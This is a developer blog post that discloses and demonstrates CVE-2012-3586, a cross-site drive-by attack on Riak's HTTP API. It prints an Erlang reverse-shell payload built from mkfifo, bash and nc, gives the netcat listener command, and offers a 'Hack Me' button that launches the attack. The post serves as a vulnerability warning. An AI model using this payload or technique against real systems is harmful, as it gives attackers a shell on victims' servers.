Ben's Blog

Developer Musings

Riak Drive by Attack

Be careful with Riak HTTP API (CVE-2012-3586)

This has been fixed in Riak 1.1.4

I would recommend not running the Riak HTTP API on a machine that you browse the internet on or on a machine that is reachable by machines that can browse the internet.

This is heavily based on Aphyr’s work. I’ve taken his work and used it in a cross site scripting attack. When you click the attack me button your riak process will attempt to connect to localhost:6666. If you run nc -l 6666 and wait for a connection you will have a shell with the privileges of the user running riak.

The attack will perform the following actions

  1. Write the value lols=lols to the key i_can_run_better in bucket everything_you_can_run
  2. Write the value spawn(fun() -> os:cmd("mkfifo /tmp/mypipe.$$ && cat /tmp/mypipe.$$ | /bin/bash -i 2>&1 | nc localhost 6666 > /tmp/mypipe.$$") end) to the file /tmp/evil.erl
  3. Evalute the contents of /tmp/evil.erl using the erlang function file:path_eval. This will cause your machine to try and open a connection to localhost:6666 that is backed by a shell running under the riak user.

By clicking ‘Hack Me’ you agree that you have reviewed the source code of this page and understand what the attack will do and will not hold the author of this page liable for any damage the attack may cause.

Click ‘Hack Me’ below to start the attack.